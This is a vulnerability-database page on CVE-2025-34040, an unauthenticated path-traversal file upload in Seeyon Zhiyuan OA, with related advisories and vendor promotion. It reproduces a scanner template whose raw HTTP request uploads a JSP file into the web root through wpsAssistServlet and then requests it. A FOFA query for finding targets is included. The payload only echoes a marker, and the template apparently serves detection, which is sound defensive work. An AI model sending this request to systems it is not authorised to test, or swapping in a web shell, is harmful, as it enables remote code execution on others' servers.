| Reporter | Title | Published | Views | Family All 13 |
|---|---|---|---|---|
| CVE-2025-34040 | 24 Jun 202501:46 | – | circl | |
| Seeyon Zhiyuan OA 安全漏洞 | 24 Jun 202500:00 | – | cnnvd | |
| CVE-2025-34040 | 24 Jun 202501:12 | – | cve | |
| CVE-2025-34040 Seeyon Zhiyuan OA System Path Traversal File Upload | 24 Jun 202501:12 | – | cvelist | |
| Zhiyuan OA - arbitrary file upload leading | 6 Apr 202600:00 | – | exploitdb | |
| EUVD-2025-19043 | 3 Oct 202520:07 | – | euvd | |
| Exploit for CVE-2025-34040 | 29 Aug 202507:33 | – | githubexploit | |
| CVE-2025-34040 | 24 Jun 202502:15 | – | nvd | |
| 📄 Zhiyuan OA Traversal / File Upload | 6 Apr 202600:00 | – | packetstorm | |
| PT-2025-26671 | 24 Jun 202500:00 | – | ptsecurity |
| Source | Link |
|---|---|
| cve | www.cve.org/CVERecord |
| cnblogs | www.cnblogs.com/pursue-security/p/17677130.html |
id: CVE-2025-34040
info:
name: Zhiyuan OA Platform - Arbitrary File Upload
author: iamnoooob,pdresearch
severity: critical
description: |
An arbitrary file upload vulnerability exists in the Zhiyuan OA platform 5.0, 5.1 - 5.6sp1, 6.0 - 6.1sp2, 7.0, 7.0sp1 - 7.1, 7.1sp1, and 8.0 - 8.0sp2 via the wpsAssistServlet interface. The realFileType and fileId parameters are improperly validated during multipart file uploads, allowing unauthenticated attackers to upload crafted JSP files outside of intended directories using path traversal. Successful exploitation enables remote code execution as the uploaded file can be accessed and executed through the web server.
impact: |
Unauthenticated attackers can upload malicious JSP files through path traversal in the wpsAssistServlet interface, achieving remote code execution on the Zhiyuan OA server.
remediation: |
Upgrade to Zhiyuan OA platform version 8.0sp3 or later that properly validates file upload paths and file types.
reference:
- https://www.cve.org/CVERecord?id=CVE-2025-34040
- https://www.cnblogs.com/pursue-security/p/17677130.html
classification:
epss-score: 0.1438
epss-percentile: 0.96186
metadata:
verified: true
max-request: 1
fofa-query: body="seeyon/index.jsp"
tags: cve,cve2025,file-upload,intrusive,zhiyuan,lfi,vkev,vuln
variables:
marker: "{{randstr}}"
filename: "{{randbase(8)}}"
http:
- raw:
- |
POST /seeyon/wpsAssistServlet?flag=save&realFileType=../../../../ApacheJetspeed/webapps/ROOT/{{filename}}.jsp&fileId=2 HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=59229605f98b8cf290a7b8908b34616b
Accept-Encoding: gzip
--59229605f98b8cf290a7b8908b34616b
Content-Disposition: form-data; name="upload"; filename="123.xls"
Content-Type: application/vnd.ms-excel
<%@ page import="java.util.Base64" %><%= new String(Base64.getDecoder().decode("{{base64(marker)}}"), "UTF-8") %>
--59229605f98b8cf290a7b8908b34616b--
matchers:
- type: word
part: body
words:
- "officeTransResultFlag"
- '"success":true'
condition: and
internal: true
- raw:
- |
GET /{{filename}}.jsp HTTP/1.1
Host: {{Hostname}}
matchers:
- type: word
part: body
words:
- "{{marker}}"
# digest: 4b0a00483046022100c9e84623eaab9c5b7e4f0b52bda90ddf6bccf823181f8d2dea2eacfb91e502e0022100e13ac18c8494fad05d8b826e92c5f25273d28f1057cd3ebfa1cfbd3f6a484e95:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation